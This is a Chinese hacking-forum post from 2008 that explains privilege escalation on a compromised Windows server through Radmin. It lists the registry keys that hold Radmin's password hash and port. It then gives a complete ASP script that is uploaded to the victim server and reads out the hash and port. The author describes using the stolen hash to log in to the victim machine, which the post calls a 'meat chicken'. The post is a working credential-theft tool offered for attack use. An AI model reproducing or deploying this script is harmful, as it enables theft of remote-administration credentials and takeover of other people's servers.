直接利用Radmin来提权

sec120

sec120

组别:管理员
性别:
积分:72
帖子:72

2008-07-24 12:52 | 只看楼主 树型| 收藏| 小中大 1^#

直接利用Radmin来提权

下面是Radmin在注册表的相对应的地方:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把以下代码保存为ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!
<%
'========================================Main======================================
Set WSH= Server.CreateObject("WSCRIPT.SHELL")
RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
Parameter="Parameter"
Port = "Port"
ParameterArray=WSH.REGREAD(RadminPath & Parameter )
Response.write "The Result of Radmin Hash"
Response.write "<br><br>"
Response.write Parameter&":"
'=========== ReadPassWord =========
If IsArray(ParameterArray) Then
For i = 0 To UBound(ParameterArray)
If Len (hex(ParameterArray(i)))=1 Then
strObj = strObj & "0" & CStr(Hex(ParameterArray(i)))
Else
strObj = strObj & Hex(ParameterArray(i))
End If
Next
response.write Lcase(strobj)
Else
response.write "Error! Can't Read!"
End If
Response.write "<br><br>"
'=========== ReadPort =========
PortArray=WSH.REGREAD(RadminPath & Port )
If IsArray(PortArray) Then
Response.write Port &":"
Response.write hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
Else
Response.write "Error! Can't Read!"
End If
'=======================================hex TO int===================================
Function hextointer(strin)
Dim i, j, k, result
result = 0
For i = 1 To Len(strin)
If Mid(strin, i, 1) = "f" or Mid(strin, i, 1) ="F" Then
j = 15
End If
If Mid(strin, i, 1) = "e" or Mid(strin, i, 1) = "E" Then
j = 14
End If
If Mid(strin, i, 1) = "d" or Mid(strin, i, 1) = "D" Then
j = 13
End If
If Mid(strin, i, 1) = "c" or Mid(strin, i, 1) = "C" Then
j = 12
End If
If Mid(strin, i, 1) = "b" or Mid(strin, i, 1) = "B" Then
j = 11
End If
If Mid(strin, i, 1) = "a" or Mid(strin, i, 1) = "A" Then
j = 10
End If
If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then
j = CInt(Mid(strin, i, 1))
End If
For k = 1 To Len(strin) - i
j = j * 16
Next
result = result + j
Next
hextointer = result
End Function
'====================================== End ======================================
%>
再利用Radmin的hash版去连接肉鸡,输入所得到的32位hash密码,呵呵,成功提权! 这也是我的第一次提权成功,感觉不错,不过有很大局限性,肉鸡必须装有Radmin......

TOP

<<上一主题|下一主题>>

1/1页1 跳转到页